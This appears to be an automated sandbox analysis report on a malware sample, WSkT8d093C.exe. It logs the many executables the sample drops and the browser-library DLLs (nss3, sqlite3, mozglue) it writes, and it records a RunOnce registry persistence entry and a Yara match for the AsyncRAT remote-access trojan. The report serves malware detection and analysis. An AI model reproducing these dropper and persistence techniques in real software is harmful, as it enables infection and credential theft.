Source: WSkT8d093C.exe	Static PE information: real checksum: 0x3b377 should be: 0x2a6fd4
Source: brokerius.exe.1.dr	Static PE information: real checksum: 0x0 should be: 0x4c2bd
Source: kukurzka9000.exe.1.dr	Static PE information: real checksum: 0x0 should be: 0xc1aef
Source: ordo_sec666.exe.1.dr	Static PE information: real checksum: 0x1bb975 should be: 0x1c98a8
Source: safert44.exe.1.dr	Static PE information: real checksum: 0x0 should be: 0x4c647

Source: initial sample	Static PE information: section name: .text entropy: 7.993561805567131
Source: initial sample	Static PE information: section name: .text entropy: 7.993561805567131

Source: C:\Program Files (x86)\Company\NewProduct\F0geI.exe	File created: C:\Users\user\AppData\LocalLow\nss3.dll	Jump to dropped file
Source: C:\Program Files (x86)\Company\NewProduct\F0geI.exe	File created: C:\Users\user\AppData\LocalLow\vcruntime140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\WSkT8d093C.exe	File created: C:\Program Files (x86)\Company\NewProduct\brokerius.exe	Jump to dropped file
Source: C:\Program Files (x86)\Company\NewProduct\captain09876.exe	File created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\SETUP_~1.EXE	Jump to dropped file
Source: C:\Program Files (x86)\Company\NewProduct\ordo_sec666.exe	File created: C:\Users\user\TypeRes\DllResource.exe	Jump to dropped file
Source: C:\Users\user\Desktop\WSkT8d093C.exe	File created: C:\Program Files (x86)\Company\NewProduct\real.exe	Jump to dropped file
Source: C:\Program Files (x86)\Company\NewProduct\F0geI.exe	File created: C:\Users\user\AppData\LocalLow\msvcp140.dll	Jump to dropped file
Source: C:\Program Files (x86)\Company\NewProduct\F0geI.exe	File created: C:\Users\user\AppData\LocalLow\freebl3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\WSkT8d093C.exe	File created: C:\Program Files (x86)\Company\NewProduct\safert44.exe	Jump to dropped file
Source: C:\Users\user\Desktop\WSkT8d093C.exe	File created: C:\Program Files (x86)\Company\NewProduct\captain09876.exe	Jump to dropped file
Source: C:\Users\user\Desktop\WSkT8d093C.exe	File created: C:\Program Files (x86)\Company\NewProduct\namdoitntn.exe	Jump to dropped file
Source: C:\Program Files (x86)\Company\NewProduct\F0geI.exe	File created: C:\Users\user\AppData\LocalLow\sqlite3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\WSkT8d093C.exe	File created: C:\Program Files (x86)\Company\NewProduct\kukurzka9000.exe	Jump to dropped file
Source: C:\Users\user\Desktop\WSkT8d093C.exe	File created: C:\Program Files (x86)\Company\NewProduct\jshainx.exe	Jump to dropped file
Source: C:\Users\user\Desktop\WSkT8d093C.exe	File created: C:\Program Files (x86)\Company\NewProduct\ordo_sec666.exe	Jump to dropped file
Source: C:\Users\user\Desktop\WSkT8d093C.exe	File created: C:\Program Files (x86)\Company\NewProduct\ffnameedit.exe	Jump to dropped file
Source: C:\Users\user\Desktop\WSkT8d093C.exe	File created: C:\Program Files (x86)\Company\NewProduct\WW1.exe	Jump to dropped file
Source: C:\Users\user\Desktop\WSkT8d093C.exe	File created: C:\Program Files (x86)\Company\NewProduct\F0geI.exe	Jump to dropped file
Source: C:\Program Files (x86)\Company\NewProduct\F0geI.exe	File created: C:\Users\user\AppData\LocalLow\mozglue.dll	Jump to dropped file
Source: C:\Program Files (x86)\Company\NewProduct\F0geI.exe	File created: C:\Users\user\AppData\LocalLow\softokn3.dll	Jump to dropped file

Boot Survival

Yara detected AsyncRAT

Source: Yara match

File source: Process Memory Space: SETUP_~1.EXE PID: 7812, type: MEMORYSTR

Source: C:\Program Files (x86)\Company\NewProduct\captain09876.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce wextract_cleanup0
Source: C:\Program Files (x86)\Company\NewProduct\captain09876.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce wextract_cleanup0
Source: C:\Program Files (x86)\Company\NewProduct\captain09876.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce wextract_cleanup0
Source: C:\Program Files (x86)\Company\NewProduct\captain09876.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce wextract_cleanup0

Source: C:\Program Files (x86)\Company\NewProduct\F0geI.exe

20_2_00408ADD

Source: C:\Users\user\Desktop\WSkT8d093C.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\WSkT8d093C.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\WSkT8d093C.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\WSkT8d093C.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\WSkT8d093C.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\WSkT8d093C.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\WSkT8d093C.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Company\NewProduct\namdoitntn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Company\NewProduct\namdoitntn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Company\NewProduct\namdoitntn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Company\NewProduct\namdoitntn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Company\NewProduct\namdoitntn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Company\NewProduct\namdoitntn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Company\NewProduct\namdoitntn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Company\NewProduct\namdoitntn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Company\NewProduct\namdoitntn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Company\NewProduct\namdoitntn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Company\NewProduct\namdoitntn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Company\NewProduct\namdoitntn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Company\NewProduct\namdoitntn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Company\NewProduct\namdoitntn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Company\NewProduct\namdoitntn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Company\NewProduct\namdoitntn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Company\NewProduct\namdoitntn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Company\NewProduct\namdoitntn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Company\NewProduct\namdoitntn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Company\NewProduct\namdoitntn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Company\NewProduct\namdoitntn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Company\NewProduct\namdoitntn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Company\NewProduct\namdoitntn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Company\NewProduct\namdoitntn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Company\NewProduct\namdoitntn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Company\NewProduct\namdoitntn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Company\NewProduct\namdoitntn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Company\NewProduct\namdoitntn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Company\NewProduct\namdoitntn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Company\NewProduct\namdoitntn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Company\NewProduct\namdoitntn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Company\NewProduct\namdoitntn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Company\NewProduct\namdoitntn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Company\NewProduct\namdoitntn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Company\NewProduct\namdoitntn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Company\NewProduct\namdoitntn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Company\NewProduct\namdoitntn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Company\NewProduct\namdoitntn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Company\NewProduct\namdoitntn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Company\NewProduct\namdoitntn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Company\NewProduct\namdoitntn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Company\NewProduct\namdoitntn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Company\NewProduct\namdoitntn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Company\NewProduct\namdoitntn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Company\NewProduct\namdoitntn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Company\NewProduct\namdoitntn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Company\NewProduct\namdoitntn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Company\NewProduct\namdoitntn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Company\NewProduct\namdoitntn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Company\NewProduct\namdoitntn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Company\NewProduct\namdoitntn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Company\NewProduct\namdoitntn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Company\NewProduct\safert44.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Company\NewProduct\safert44.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Company\NewProduct\safert44.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Company\NewProduct\safert44.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Company\NewProduct\safert44.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Company\NewProduct\safert44.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Company\NewProduct\safert44.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Company\NewProduct\safert44.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Company\NewProduct\safert44.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Company\NewProduct\safert44.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Company\NewProduct\safert44.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Company\NewProduct\safert44.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Company\NewProduct\safert44.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Company\NewProduct\safert44.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Company\NewProduct\safert44.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Company\NewProduct\safert44.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Company\NewProduct\safert44.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Company\NewProduct\safert44.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Company\NewProduct\safert44.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Company\NewProduct\safert44.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Company\NewProduct\safert44.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Company\NewProduct\safert44.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Company\NewProduct\safert44.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Company\NewProduct\safert44.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Company\NewProduct\safert44.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Company\NewProduct\safert44.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Company\NewProduct\safert44.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Company\NewProduct\safert44.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Company\NewProduct\safert44.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Company\NewProduct\safert44.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Company\NewProduct\safert44.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Company\NewProduct\safert44.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Company\NewProduct\safert44.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Company\NewProduct\safert44.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Company\NewProduct\safert44.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Company\NewProduct\safert44.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Company\NewProduct\safert44.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Company\NewProduct\safert44.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Company\NewProduct\safert44.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Company\NewProduct\safert44.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Company\NewProduct\safert44.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Company\NewProduct\safert44.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Company\NewProduct\safert44.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Company\NewProduct\safert44.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Company\NewProduct\jshainx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Company\NewProduct\jshainx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Company\NewProduct\jshainx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Company\NewProduct\jshainx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Company\NewProduct\jshainx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Company\NewProduct\jshainx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Company\NewProduct\jshainx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Company\NewProduct\jshainx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Company\NewProduct\jshainx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Company\NewProduct\jshainx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Company\NewProduct\jshainx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Company\NewProduct\jshainx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Company\NewProduct\jshainx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Company\NewProduct\jshainx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Company\NewProduct\jshainx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Company\NewProduct\jshainx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Company\NewProduct\jshainx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Company\NewProduct\jshainx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Company\NewProduct\jshainx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Company\NewProduct\jshainx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Company\NewProduct\jshainx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Company\NewProduct\jshainx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Company\NewProduct\jshainx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Company\NewProduct\jshainx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Company\NewProduct\jshainx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Company\NewProduct\jshainx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Company\NewProduct\jshainx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Company\NewProduct\jshainx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Company\NewProduct\jshainx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Company\NewProduct\jshainx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Company\NewProduct\jshainx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Company\NewProduct\jshainx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Company\NewProduct\jshainx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Company\NewProduct\jshainx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Company\NewProduct\jshainx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Company\NewProduct\jshainx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Company\NewProduct\jshainx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Company\NewProduct\jshainx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Company\NewProduct\jshainx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Company\NewProduct\jshainx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Company\NewProduct\jshainx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Company\NewProduct\jshainx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Company\NewProduct\captain09876.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Company\NewProduct\ffnameedit.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Company\NewProduct\ffnameedit.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Company\NewProduct\ffnameedit.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Company\NewProduct\ffnameedit.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Company\NewProduct\ffnameedit.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Company\NewProduct\ffnameedit.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Company\NewProduct\ffnameedit.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Company\NewProduct\ffnameedit.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Company\NewProduct\ffnameedit.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Company\NewProduct\ffnameedit.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Company\NewProduct\ffnameedit.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Company\NewProduct\ffnameedit.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Company\NewProduct\ffnameedit.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Company\NewProduct\ffnameedit.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Company\NewProduct\ffnameedit.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Company\NewProduct\ffnameedit.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Company\NewProduct\ffnameedit.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Company\NewProduct\ffnameedit.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Company\NewProduct\ffnameedit.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Company\NewProduct\ffnameedit.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Company\NewProduct\ffnameedit.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Company\NewProduct\ffnameedit.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Company\NewProduct\ffnameedit.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Company\NewProduct\ffnameedit.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Company\NewProduct\ffnameedit.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Company\NewProduct\ffnameedit.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Company\NewProduct\ffnameedit.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Company\NewProduct\ffnameedit.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Company\NewProduct\ffnameedit.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Company\NewProduct\ffnameedit.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Company\NewProduct\ffnameedit.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Company\NewProduct\ffnameedit.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Company\NewProduct\ffnameedit.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Company\NewProduct\ffnameedit.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Company\NewProduct\ffnameedit.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Company\NewProduct\ffnameedit.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Company\NewProduct\ffnameedit.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Company\NewProduct\ffnameedit.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Company\NewProduct\ffnameedit.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Company\NewProduct\ffnameedit.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Company\NewProduct\ffnameedit.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Company\NewProduct\ffnameedit.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\SETUP_~1.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\SETUP_~1.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\SETUP_~1.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\SETUP_~1.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\SETUP_~1.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\SETUP_~1.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\SETUP_~1.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\SETUP_~1.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\SETUP_~1.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\SETUP_~1.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\SETUP_~1.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\SETUP_~1.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\SETUP_~1.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\SETUP_~1.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\SETUP_~1.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\SETUP_~1.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\SETUP_~1.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\SETUP_~1.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\SETUP_~1.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\SETUP_~1.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\SETUP_~1.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\SETUP_~1.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\SETUP_~1.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\SETUP_~1.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\SETUP_~1.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\SETUP_~1.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\SETUP_~1.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\SETUP_~1.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\SETUP_~1.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\SETUP_~1.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\SETUP_~1.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\SETUP_~1.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\SETUP_~1.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\SETUP_~1.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\SETUP_~1.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\SETUP_~1.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\SETUP_~1.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\SETUP_~1.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\SETUP_~1.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\SETUP_~1.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\SETUP_~1.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\SETUP_~1.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\SETUP_~1.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\SETUP_~1.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\SETUP_~1.EXE	Process information set: NOOPENFILEERRORBOX
